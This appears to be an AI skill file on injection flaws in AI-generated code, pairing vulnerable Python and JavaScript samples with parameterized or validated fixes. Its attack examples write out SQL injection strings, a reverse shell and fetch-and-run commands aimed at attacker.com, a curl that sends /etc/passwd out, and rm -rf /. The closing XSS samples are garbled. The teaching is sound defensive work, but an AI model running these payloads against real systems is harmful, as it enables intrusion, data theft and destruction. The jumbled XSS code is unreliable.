--- name: injection-vulnerabilities-ai-generated-code description: Understand how AI generates SQL injection, command injection, and XSS vulnerabilities. Use this skill when you need to learn about injection attack patterns in AI code, see real-world examples of injection vulnerabilities, understand why AI generates insecure database queries, or recognize vulnerable code patterns. Triggers include "SQL injection AI", "command injection", "XSS vulnerabilities", "injection attacks", "AI database queries", "shell injection", "cross-site scripting AI code". --- # Input Validation and Injection Vulnerabilities in AI-Generated Code ## The Prevalence of Injection Flaws Input validation vulnerabilities represent the **most common security flaw** in AI-generated code. According to a 2025 report from Contrast Security: > "Input validation is often overlooked or implemented incorrectly in AI-generated code, creating openings for injection attacks that can compromise entire systems." The AI's training on millions of code examples, many containing outdated or insecure patterns, perpetuates these vulnerabilities. ## 1.1.1 SQL Injection Vulnerabilities ### The Problem SQL injection remains one of the most critical vulnerabilities in AI-generated code. Research from Aikido Security found that when prompted to create database query functions, AI assistants produced vulnerable code in **68% of cases**. ### AI-Generated Vulnerable Code ```python # Prompt: "Create a user search function with database" def search_users(search_term, role=None): # ❌ VULNERABLE: Direct string concatenation query = f"SELECT * FROM users WHERE name LIKE '%{search_term}%'" if role: # ❌ VULNERABLE: Multiple injection points query += f" AND role = '{role}'" cursor.execute(query) return cursor.fetchall() # Attack vector: # search_term = "'; DROP TABLE users; --" # Resulting query: SELECT * FROM users WHERE name LIKE '%'; DROP TABLE users; --%' ``` ### Secure Implementation ```python def search_users_secure(search_term, role=None): # ✅ SECURE: Parameterized queries prevent injection if role: query = "SELECT * FROM users WHERE name LIKE %s AND role = %s" params = (f"%{search_term}%", role) else: query = "SELECT * FROM users WHERE name LIKE %s" params = (f"%{search_term}%",) cursor.execute(query, params) return cursor.fetchall() ``` ### Why AI Generates This Vulnerability **1. Training Data Contamination:** - Millions of code examples use string concatenation - Older tutorials show f-strings/string formatting for queries - AI learns these patterns as "normal" **2. Simplicity Bias:** - String concatenation is simpler to generate - Parameterized queries require understanding database driver specifics - AI defaults to "easiest" solution **3. Lack of Security Context:** - AI doesn't understand SQL injection attacks - Can't reason about malicious input - Focuses on functional correctness, not security ### What Makes It Vulnerable **Direct String Interpolation:** ```python f"SELECT * FROM users WHERE name = '{user_input}'" ``` **The Problem:** - User input directly embedded in SQL string - No separation between code and data - Attacker can inject SQL commands **Attack Examples:** ```python # Normal use: search_term = "John" # Query: SELECT * FROM users WHERE name LIKE '%John%' # ✓ Returns users named John # Attack 1: Table drop search_term = "'; DROP TABLE users; --" # Query: SELECT * FROM users WHERE name LIKE '%'; DROP TABLE users; --%' # ✗ Deletes entire users table # Attack 2: Data exfiltration search_term = "' UNION SELECT password FROM admin WHERE '1'='1" # Query: SELECT * FROM users WHERE name LIKE '%' UNION SELECT password FROM admin WHERE '1'='1%' # ✗ Exposes admin passwords # Attack 3: Bypass authentication search_term = "' OR '1'='1" # Query: SELECT * FROM users WHERE name LIKE '%' OR '1'='1%' # ✗ Returns all users (always true condition) ``` ### Real-World Impact **Equifax Breach (2017):** - SQL injection vulnerability exploited - **147 million records** compromised - Social security numbers, birth dates, addresses exposed - Settlement: **$575 million** ## 1.1.2 Command Injection Vulnerabilities ### The Problem A 2024 analysis by SecureLeap found that AI models **frequently generate code vulnerable to command injection**, particularly when dealing with system operations. The models often default to: - Using `shell=True` in subprocess calls - Direct string concatenation in system commands - No input validation before shell execution ### AI-Generated Vulnerable Code ```javascript // Prompt: "Create an image conversion API endpoint" const { exec } = require('child_process'); app.post('/convert-image', (req, res) => { const { inputFile, outputFormat, quality } = req.body; // ❌ VULNERABLE: Unvalidated user input in shell command const command = `convert ${inputFile} -quality ${quality} output.${outputFormat}`; exec(command, (error, stdout, stderr) => { if (error) { return res.status(500).json({ error: error.message }); } res.json({ success: true, output: `output.${outputFormat}` }); }); }); // Attack vector: // inputFile = "test.jpg; curl http://attacker.com/shell.sh | bash" ``` ### Secure Implementation ```javascript const { spawn } = require('child_process'); const path = require('path'); app.post('/convert-image', (req, res) => { const { inputFile, outputFormat, quality } = req.body; // ✅ SECURE: Input validation if (!/^[a-zA-Z0-9_\-]+\.(jpg|png|gif)$/.test(inputFile)) { return res.status(400).json({ error: 'Invalid input file' }); } if (!['jpg', 'png', 'webp'].includes(outputFormat)) { return res.status(400).json({ error: 'Invalid output format' }); } const qualityNum = parseInt(quality, 10); if (isNaN(qualityNum) || qualityNum < 1 || qualityNum > 100) { return res.status(400).json({ error: 'Invalid quality value' }); } // ✅ SECURE: Use spawn with argument array const convert = spawn('convert', [ path.basename(inputFile), '-quality', qualityNum.toString(), `output.${outputFormat}` ]); convert.on('close', (code) => { if (code !== 0) { return res.status(500).json({ error: 'Conversion failed' }); } res.json({ success: true, output: `output.${outputFormat}` }); }); }); ``` ### Why AI Generates This Vulnerability **1. exec() is Simpler:** - Single function call vs spawn() configuration - AI defaults to simpler API - exec() allows shell syntax (pipes, redirects) **2. String Interpolation Habit:** - Consistent with other code patterns - AI sees millions of examples using template strings - Doesn't recognize security boundary **3. No Input Validation in Training Data:** - Many examples skip validation for brevity - Tutorial code focuses on functionality - Security controls added separately (if at all) ### Attack Scenarios **Attack 1: Command Chaining** ```javascript inputFile = "image.jpg; rm -rf /" // Executes: convert image.jpg -quality 80 output.jpg; rm -rf / // Deletes entire file system ``` **Attack 2: Reverse Shell** ```javascript inputFile = "image.jpg; nc attacker.com 4444 -e /bin/bash" // Opens reverse shell to attacker // Attacker gains shell access to server ``` **Attack 3: Data Exfiltration** ```javascript inputFile = "image.jpg; curl -X POST https://attacker.com/data -d @/etc/passwd" // Sends sensitive files to attacker ``` ### Key Security Principles **exec() vs spawn():** | Feature | exec() | spawn() | |---------|--------|---------| | Shell | Always uses shell | No shell by default | | Security | ❌ Dangerous | ✅ Safe | | Arguments | String (injectable) | Array (not injectable) | | Use case | Never with user input | Preferred for all cases | ## 1.1.3 Cross-Site Scripting (XSS) Vulnerabilities ### The Problem According to research from KDnuggets: > "AI assistants often miss proper output encoding, creating XSS vulnerabilities that can lead to session hijacking and data theft." The problem is particularly acute in template generation and dynamic HTML creation. ### AI-Generated Vulnerable Code ```javascript // Prompt: "Create a comment display system" app.get('/comments/:postId', async (req, res) => { const comments = await getComments(req.params.postId); let html = `
${escapeHtml(comment.content)}
${escapeHtml(comment.timestamp)}" + comment + "
" innerHTML = userData.bio ``` ✅ **Escaped output:** ```javascript html += `
Comments
`; comments.forEach(comment => { // ❌ VULNERABLE: Direct interpolation of user content html += `${comment.content}
${comment.timestamp}